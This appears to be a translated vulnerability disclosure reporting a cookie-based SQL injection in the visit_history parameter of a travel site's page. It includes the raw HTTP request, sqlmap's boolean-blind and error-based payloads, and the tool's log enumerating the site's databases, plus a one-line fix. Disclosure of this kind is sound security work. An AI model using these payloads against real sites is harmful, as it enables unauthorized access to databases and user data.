Visit the home page to view the submitted message and find that the link parameters are submitted with the cookie. We have detected the cookie injection vulnerability in the fuzz parameter. This problem is serious and we hope to pay attention to it.
Detailed description:
GET/zhoubian/leyuan/HTTP/1.1
Host: sy.tuniu.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv: 16.0) Gecko/20100101 Firefox/16.0
Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8
Accept-Language: en-US, en; q = 0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://sy.tuniu.com/tours/311094
Cookie: tuniuuser_citycode = MTkwMg % 3D % 3D; tuniu_channel = region % 3D; visit_history = 311094; PHPSESSID = aq8r0pudtjl3t61vkss0i563o3
DNT: 1
Cache-Control: max-age = 0
Cookie injection vulnerability found in visit_history = 311094
Sqlmap identified the following injection points with a total of 210 HTTP (s) requests:
---
Place: Cookie
Parameter: visit_history
Type: boolean-based blind
Title: AND boolean-based blind-WHERE or HAVING clause
Payload: tuniuuser_citycode = MTkwMg % 3D % 3D; tuniu_channel = Hangzhou % 3D; visit_history = 311094) AND 4608 = 4608 AND (9847 = 9847; PHPSESSID = Beijing
Type: error-based
Title: MySQL >=5.0 AND error-based-WHERE or HAVING clause
Payload: tuniuuser_citycode = MTkwMg % 3D % 3D; tuniu_channel = Hangzhou % 3D; visit_history = 311094) AND (SELECT 3540 FROM (select count (*), CONCAT (0x3a79756b3a, (SELECT (case when (3540 = 3540) THEN 1 ELSE 0 END), 0x3a6878653a, FLOOR (RAND (0) * 2) x FROM INFORMATION_SCHEMA.CHARACTER_SETS group by x)) AND (5085 = 5085; PHPSESSID = aq8r0pudtjl3t61vkss0i563o3
---
[11:03:27] [INFO] the back-end DBMS is MySQL
Web server operating system: Linux CentOS
Web application technology: PHP 5.3.3, Apache 2.2.15
Back-end DBMS: MySQL 5.0
[11:03:27] [INFO] fetching database names
[11:03:27] [WARNING] the SQL query provided does not return any output
[11:03:27] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '-- no-cast' and/or switch' -- hex'
[11:03:27] [INFO] fetching number of databases
[11:03:27] [INFO] retrieved: 3
[11:03:31] [INFO] retrieving the length of query output
[11:03:31] [INFO] retrieved: 18
[11:03:50] [INFO] retrieved: information_schema
[11:03:50] [INFO] retrieving the length of query output
[11:03:50] [INFO] retrieved: 4
[11:03:59] [INFO] retrieved: test
[11:03:59] [INFO] retrieving the length of query output
[11:03:59] [INFO] retrieved: 5
[11:04:09] [INFO] retrieved: tuniu
Available databases [3]:
[*] Information_schema
[*] Test
[*] Tuniu
[11:04:10] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error)-202 times
[11:04:10] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/sy.tuniu.com'
-------------------------------------------------------------
Use sqlmap to obtain database information
Available databases [3]:
[*] Information_schema
[*] Test
[*] Tuniu
I did not continue to do it. There are many problems. Please try again on the dark clouds if you have time ~~
Solution:
Parameter Filtering